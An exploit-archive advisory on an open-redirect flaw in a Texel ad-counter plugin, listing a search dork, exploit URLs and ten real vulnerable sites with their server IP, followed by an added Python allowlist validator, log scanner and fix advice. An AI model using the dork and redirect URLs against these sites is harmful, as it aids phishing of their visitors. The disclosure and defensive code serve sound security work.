##################################################################################
# Exploit Title : HollandPlaza TexelseMedia AdvertisementsCounter Plugins Open Redirection
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 28/03/2019
# Vendor Homepage : texelsemedia.nl - texelplaza.nl
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : High
# Google Dorks : inurl:/plugins/advertisementscounter/ site:nl
# Vulnerability Type : CWE-601 [ URL Redirection to Untrusted Site ('Open Redirect') ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
# Reference Link : cxsecurity.com/issue/WLB-2019030235
##################################################################################
# Impact :
***********
HollandPlaza TexelseMedia AdvertisementsCounter Plugins accepts user-controlled input that specifies a
link to an external site and uses that link in a redirect. This simplifies phishing attacks. An HTTP parameter may
contain a URL value and can cause the web application to redirect the request to the specified URL.
By modifying the URL value to point at a malicious site, an attacker may successfully launch a phishing scam and
steal user credentials. Because the server name in the modified link is identical to the original site, phishing attempts
have a more trustworthy appearance. An open redirect is a failure in that process that makes it possible for attackers to
steer users to malicious websites. This vulnerability is used in phishing attacks to get users to visit malicious sites
without realizing it. Web users often encounter redirection when they visit the website of a company whose name
has changed or which has been acquired by another company. When a user visits the fake web page, their computer
may be infected with malware whose task is to deceive the legitimate user and steal their personal data.
##################################################################################
# Vulnerable File :
*****************
/advertisementscounter.php
# Vulnerable Parameters :
***********************
?id=
&url=
?id=[ID-NUMBER]&url=
# Open Redirection Exploit :
**************************
/plugins/advertisementscounter/advertisementscounter.php?id=[ID-NUMBER]&url=https://www.[REDIRECTION-ADDRESS].gov
/plugins/advertisementscounter/advertisementscounter.php?id=14774&url=https://www.[REDIRECTION-ADDRESS].gov
##################################################################################
# Example Vulnerable Sites :
*************************
[+] Vulnerable IP Address => 213.206.113.181 => There are 11 domains hosted on this server.
[+] kabelkranttexel.nl/plugins/advertisementscounter/advertisementscounter.php?id=14774&url=https://cxsecurity.com
[+] texelplaza.nl/plugins/advertisementscounter/advertisementscounter.php?id=14774&url=https://cxsecurity.com
[+] texel-plaza.nl/plugins/advertisementscounter/advertisementscounter.php?id=14774&url=https://cxsecurity.com
[+] texelnieuws.nl/plugins/advertisementscounter/advertisementscounter.php?id=14774&url=https://cxsecurity.com
[+] texeldezemaand.nl/plugins/advertisementscounter/advertisementscounter.php?id=14774&url=https://cxsecurity.com
[+] texelditweekend.nl/plugins/advertisementscounter/advertisementscounter.php?id=14774&url=https://cxsecurity.com
[+] familieberichtentexel.nl/plugins/advertisementscounter/advertisementscounter.php?id=14774&url=https://cxsecurity.com
[+] werkoptexel.nl/plugins/advertisementscounter/advertisementscounter.php?id=14774&url=https://cxsecurity.com
[+] recreerenoptexel.nl/plugins/advertisementscounter/advertisementscounter.php?id=14774&url=https://cxsecurity.com
[+] recreatieoptexel.nl/plugins/advertisementscounter/advertisementscounter.php?id=14774&url=https://cxsecurity.com
##################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
##################################################################################
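The root cause described in the advisory is a redirect that trusts the client-supplied `url` parameter. The following Python is an added example, not code from the advisory or from the plugin vendor: it shows the allowlist check a fixed `advertisementscounter.php`-style handler needs before emitting a `Location` header (rejecting the common bypass shapes such as scheme-relative `//host`, non-http schemes and userinfo tricks), and a small scanner that flags off-site `url=` values for this endpoint in web access logs. The allowlist (`ALLOWED_HOSTS`) and the log lines are constructed for illustration.

```python
"""Added example: allowlist-based redirect validation plus a log scan for
off-site redirect targets on the advertisementscounter.php endpoint.
ALLOWED_HOSTS and SAMPLE_LOG are constructed values, not data from the advisory."""
import re
from urllib.parse import urlsplit, parse_qs

# Hypothetical allowlist: hosts the ad counter may legitimately send visitors to.
ALLOWED_HOSTS = {"texelplaza.nl", "www.texelplaza.nl"}


def is_safe_redirect(target: str, allowed_hosts=ALLOWED_HOSTS) -> bool:
    """True only for a same-site relative path or an http(s) URL whose host
    is on the allowlist. Everything ambiguous is refused."""
    if not target or any(c in target for c in "\\\r\n\x00"):
        return False                      # backslashes / CRLF / NUL: refuse outright
    target = target.strip()
    if target.startswith("//"):
        return False                      # scheme-relative URL points off-site
    try:
        parts = urlsplit(target)
    except ValueError:
        return False                      # malformed (e.g. bad IPv6 literal)
    if parts.scheme == "" and parts.netloc == "":
        return target.startswith("/")     # plain relative path stays on this site
    if parts.scheme.lower() not in ("http", "https"):
        return False                      # javascript:, data:, ftp: ...
    if parts.username is not None or parts.password is not None:
        return False                      # user@host tricks
    host = (parts.hostname or "").lower()
    return host in allowed_hosts          # exact match, so sub/super-domains fail


# Apache "combined" access-log shape (constructed lines below follow it).
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)


def find_external_redirects(log_lines, allowed_hosts=ALLOWED_HOSTS):
    """Return (client_ip, url_value, status) for every request to the
    advertisementscounter endpoint whose url= target fails the allowlist."""
    findings = []
    for line in log_lines:
        m = LOG_LINE.match(line)
        if not m:
            continue
        path = m.group("path")
        if "advertisementscounter.php" not in path:
            continue
        query = parse_qs(urlsplit(path).query)   # parse_qs percent-decodes values
        for target in query.get("url", []):
            if not is_safe_redirect(target, allowed_hosts):
                findings.append((m.group("ip"), target, m.group("status")))
    return findings


# Constructed sample log: one legitimate on-site redirect, two off-site ones, one unrelated hit.
SAMPLE_LOG = [
    '198.51.100.7 - - [28/Mar/2019:10:00:01 +0100] "GET /plugins/advertisementscounter/advertisementscounter.php?id=14774&url=https%3A%2F%2Fwww.texelplaza.nl%2Fadvertentie HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [28/Mar/2019:10:00:02 +0100] "GET /plugins/advertisementscounter/advertisementscounter.php?id=14774&url=https%3A%2F%2Fexample.org%2Flogin HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [28/Mar/2019:10:00:03 +0100] "GET /plugins/advertisementscounter/advertisementscounter.php?id=14774&url=%2F%2Fexample.org%2F HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    '192.0.2.3 - - [28/Mar/2019:10:00:04 +0100] "GET /index.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, url, status in find_external_redirects(SAMPLE_LOG):
        print(f"off-site redirect: client={ip} target={url} status={status}")
```

The same allowlist logic transplants directly into the PHP handler: validate `$_GET['url']` before calling `header('Location: ...')`, and fall back to the site root on failure. A stronger fix for a click counter is to not accept a destination from the client at all: the advertisement's target URL is already known server-side, so the handler can look it up by `id` and redirect only to that stored value.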